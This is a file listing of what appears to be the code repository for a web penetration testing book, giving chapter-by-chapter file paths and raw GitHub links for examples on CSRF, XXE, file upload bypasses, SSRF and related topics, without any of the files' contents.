├── Chapter 1
│   ├── Page-2-Demonstration of the same-origin policy in Google Chrome.html
│   └── Page-5-AJAX and the same-origin policy.html
├── Chapter 3
│   └── DOM-based-Page-21.html
├── Chapter 4
│   ├── Exploiting CSRF in JSON requests-Page-8.html
│   ├── Exploiting CSRF in JSON requests-Page-9.html
│   ├── Exploiting POST-request based CSRF-Page-4.html
│   ├── Exploring pseudo anti-CSRF tokens-Page-11.html
│   ├── Flash comes to the rescue-Page-13.html
│   ├── Introducing CSRF-Page-2.html
│   └── PayPal-CSRF-Page-7.html
├── Chapter 6
│   ├── Page-11-SVG-Images.svg
│   ├── Page-13-Case-sensitive blacklist extension check bypass.php
│   ├── Page-15-MIME content type verification bypass.php
│   ├── Page-17-Apache's htaccess trick to execute benign files as PHP.php
│   ├── Page-18-SetHandler method.htaccess
│   ├── Page-19-Bypassing image content verification.php
│   ├── Page-2-Introducing-file-upload-vulnerability.php
│   ├── Page-3-Remote-code-execution.php
│   ├── Page-4-Remote-code-execution.jsp
│   └── Page-9-SWF-the-flash.as
├── Chapter 8
│   ├── Page-10-SSRF-through-XXE.xml
│   ├── Page-13-Denial-of-Service-through-XXE.xml
│   ├── Page-13-Remote code execution.xml
│   ├── Page-15-XML-billions-Laughs.xml
│   ├── Page-2-XML-101.xml
│   ├── Page-3-Internal-DTD.xml
│   ├── Page-3-XML-Attributes.xml
│   ├── Page-4-External-DTD-student.dtd
│   ├── Page-4-External-DTD.xml
│   ├── Page-5-Entities.xml
│   ├── Page-5-Entity-declaration-2.xml
│   ├── Page-5-Entity-declaration.xml
│   ├── Page-6-XXE-attack.php
│   ├── Page-8-Reading-files.xml
│   └── Page-9-PHP Base64 conversion URI as an alternative.xml
├── Chapter 9
│   ├── Page-16-DOM-clobbering-2.html
│   ├── Page-16-DOM-clobbering.html
│   ├── Page-18-Relative-Path-Overwrite.css
│   ├── Page-19-Relative-Path-Overwrite-2.html
│   ├── Page-21-Controlling-CSS.html
│   ├── Page-22-Internet-Explorer.html
│   ├── Page-25-UI-redressing.html
│   ├── Page-26-UI-redressing-2.html
│   ├── Page-26-UI-redressing-3.html
│   ├── Page-29-PHP-serialization.php
│   ├── Page-3-Demonstrating-SSRF.php
│   ├── Page-30-PHP-serialization.php
│   └── Page-31-Object-Injection.php
├── LICENSE
└── README.md

/Chapter 1/Page-2-Demonstration of the same-origin policy in Google Chrome.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 1/Page-2-Demonstration of the same-origin policy in Google Chrome.html

/Chapter 1/Page-5-AJAX and the same-origin policy.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 1/Page-5-AJAX and the same-origin policy.html

/Chapter 3/DOM-based-Page-21.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 3/DOM-based-Page-21.html

/Chapter 4/Exploiting CSRF in JSON requests-Page-8.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploiting CSRF in JSON requests-Page-8.html

/Chapter 4/Exploiting CSRF in JSON requests-Page-9.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploiting CSRF in JSON requests-Page-9.html

/Chapter 4/Exploiting POST-request based CSRF-Page-4.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploiting POST-request based CSRF-Page-4.html

/Chapter 4/Exploring pseudo anti-CSRF tokens-Page-11.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Exploring pseudo anti-CSRF tokens-Page-11.html

/Chapter 4/Flash comes to the rescue-Page-13.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Flash comes to the rescue-Page-13.html

/Chapter 4/Introducing CSRF-Page-2.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/Introducing CSRF-Page-2.html

/Chapter 4/PayPal-CSRF-Page-7.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 4/PayPal-CSRF-Page-7.html

/Chapter 6/Page-11-SVG-Images.svg:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-11-SVG-Images.svg

/Chapter 6/Page-13-Case-sensitive blacklist extension check bypass.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-13-Case-sensitive blacklist extension check bypass.php

/Chapter 6/Page-15-MIME content type verification bypass.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-15-MIME content type verification bypass.php

/Chapter 6/Page-17-Apache's htaccess trick to execute benign files as PHP.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-17-Apache's htaccess trick to execute benign files as PHP.php

/Chapter 6/Page-18-SetHandler method.htaccess:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-18-SetHandler method.htaccess

/Chapter 6/Page-19-Bypassing image content verification.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-19-Bypassing image content verification.php

/Chapter 6/Page-2-Introducing-file-upload-vulnerability.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-2-Introducing-file-upload-vulnerability.php

/Chapter 6/Page-3-Remote-code-execution.php:

/Chapter 6/Page-4-Remote-code-execution.jsp:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-4-Remote-code-execution.jsp

/Chapter 6/Page-9-SWF-the-flash.as:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 6/Page-9-SWF-the-flash.as

/Chapter 8/Page-10-SSRF-through-XXE.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-10-SSRF-through-XXE.xml

/Chapter 8/Page-13-Denial-of-Service-through-XXE.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-13-Denial-of-Service-through-XXE.xml

/Chapter 8/Page-13-Remote code execution.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-13-Remote code execution.xml

/Chapter 8/Page-15-XML-billions-Laughs.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-15-XML-billions-Laughs.xml

/Chapter 8/Page-2-XML-101.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-2-XML-101.xml

/Chapter 8/Page-3-Internal-DTD.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-3-Internal-DTD.xml

/Chapter 8/Page-3-XML-Attributes.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-3-XML-Attributes.xml

/Chapter 8/Page-4-External-DTD-student.dtd:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-4-External-DTD-student.dtd

/Chapter 8/Page-4-External-DTD.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-4-External-DTD.xml

/Chapter 8/Page-5-Entities.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-5-Entities.xml

/Chapter 8/Page-5-Entity-declaration-2.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-5-Entity-declaration-2.xml

/Chapter 8/Page-5-Entity-declaration.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-5-Entity-declaration.xml

/Chapter 8/Page-6-XXE-attack.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-6-XXE-attack.php

/Chapter 8/Page-8-Reading-files.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-8-Reading-files.xml

/Chapter 8/Page-9-PHP Base64 conversion URI as an alternative.xml:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 8/Page-9-PHP Base64 conversion URI as an alternative.xml

/Chapter 9/Page-16-DOM-clobbering-2.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-16-DOM-clobbering-2.html

/Chapter 9/Page-16-DOM-clobbering.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-16-DOM-clobbering.html

/Chapter 9/Page-18-Relative-Path-Overwrite.css:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-18-Relative-Path-Overwrite.css

/Chapter 9/Page-19-Relative-Path-Overwrite-2.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-19-Relative-Path-Overwrite-2.html

/Chapter 9/Page-21-Controlling-CSS.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-21-Controlling-CSS.html

/Chapter 9/Page-22-Internet-Explorer.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-22-Internet-Explorer.html

/Chapter 9/Page-25-UI-redressing.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-25-UI-redressing.html

/Chapter 9/Page-26-UI-redressing-2.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-26-UI-redressing-2.html

/Chapter 9/Page-26-UI-redressing-3.html:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-26-UI-redressing-3.html

/Chapter 9/Page-29-PHP-serialization.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-29-PHP-serialization.php

/Chapter 9/Page-3-Demonstrating-SSRF.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-3-Demonstrating-SSRF.php

/Chapter 9/Page-30-PHP-serialization.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-30-PHP-serialization.php

/Chapter 9/Page-31-Object-Injection.php:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/Chapter 9/Page-31-Object-Injection.php

/LICENSE:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/LICENSE

/README.md:
https://raw.githubusercontent.com/PacktPublishing/Mastering-Modern-Web-Penetration-Testing/HEAD/README.md